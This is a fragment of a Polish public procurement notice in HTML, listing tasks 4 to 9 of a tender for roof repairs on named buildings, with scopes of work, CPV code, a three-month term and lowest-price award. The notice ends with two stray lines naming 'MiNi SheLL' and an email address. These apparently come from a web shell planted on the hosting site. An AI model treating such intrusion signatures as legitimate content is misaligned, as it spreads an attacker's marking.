<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 4 obejmuje wykonanie remontu dachów budynku przy ul. Barlickiego 43 (lokal użytkowy). Zakres robót obejmuje m.in.: wymianę pokrycia dachu krytego papą, wymianę obróbek blacharskich, przemurowanie kominów, wykonanie wylewek cementowych, wymianę rynien i rur spustowych. Przedmiot zamówienia został szczegółowo opisany w przedmiarze robót (załącznik nr 8 do SIWZ) oraz w specyfikacji technicznej wykonania i odbioru robót budowlanych (załącznik nr 9 do SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 5 obejmuje wykonanie remontu dachów budynków przy ul. Świerczyny 9, ul. Świerczyny 11, ul. Bocznej 8-8a-8b. Zakres robót obejmuje m.in.: wymianę pokrycia dachu krytego papą, wymianę rynien i rur spustowych, przemurowanie kominów, wykonanie tynków, wymianę deskowania, wzmocnienie krokwi, odgrzybianie bali lub krawędziaków. Przedmiot zamówienia został szczegółowo opisany w przedmiarze robót (załącznik nr 8 do SIWZ) oraz w specyfikacji technicznej wykonania i odbioru robót budowlanych (załącznik nr 9 do SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 6 obejmuje wykonanie remontu dachów budynków przy ul. Chorzowskiej 99, ul. Wallisa 10, ul. Św. Jana 2. Zakres robót obejmuje m.in.: wymianę pokrycia dachu krytego dachówką karpiówką, wymianę rynien i rur spustowych, wymianę łacenia dachu, wykonane pomostów na dachu, przemurowanie kominów, montaż barier śniegowych. Przedmiot zamówienia został szczegółowo opisany w przedmiarze robót (załącznik nr 8 do SIWZ) oraz w specyfikacji technicznej wykonania i odbioru robót budowlanych (załącznik nr 9 do SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 7 obejmuje wykonanie remontu dachów budynków przy ul. Św. Jana 1, ul. Wallisa 3, ul. Bytomskiej 69. Zakres robót obejmuje m.in.: wymianę pokrycia dachu krytego dachówką karpiówką, wymianę rynien i rur spustowych, wymianę łacenia dachu, wymianę elementów konstrukcyjnych dachu, wzmocnienie krokwi, wymianę deskowania,  przemurowanie kominów, wykonanie pomostów na dachu. Przedmiot zamówienia został szczegółowo opisany w przedmiarze robót (załącznik nr 8 do SIWZ) oraz w specyfikacji technicznej wykonania i odbioru robót budowlanych (załącznik nr 9 do SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 8 obejmuje wykonanie remontu dachów budynków przy ul. Imieli 2, ul. Łagiewnickiej 72. Zakres robót obejmuje m.in.: wymianę rynien i rur spustowych, wymianę obróbek blacharskich, wymianę pokrycia dachu krytego dachówką karpiówką, wymianę elementów konstrukcyjnych dachu, wzmocnienie krokwi, wymianę deskowania,  przemurowanie kominów, wykonanie pomostów na dachu. Przedmiot zamówienia został szczegółowo opisany w przedmiarze robót (załącznik nr 8 do SIWZ) oraz w specyfikacji technicznej wykonania i odbioru robót budowlanych (załącznik nr 9 do SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 9 obejmuje wykonanie remontu dachów budynków przy ul. Polaka 4-6-8, ul. Katowickiej 29-29a, ul. Katowickiej 33-33a. Zakres robót obejmuje m.in.: wymianę pokrycia dachu krytego blachą, wymianę pokrycia dachu krytego papą, osadzenie okien w połaci dachowej, wzmocnienie krokwi, wymianę elementów konstrukcyjnych dachu, wymianę rynien i rur spustowych, wymianę obróbek blacharskich. Przedmiot zamówienia został szczegółowo opisany w przedmiarze robót (załącznik nr 8 do SIWZ) oraz w specyfikacji technicznej wykonania i odbioru robót budowlanych (załącznik nr 9 do SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com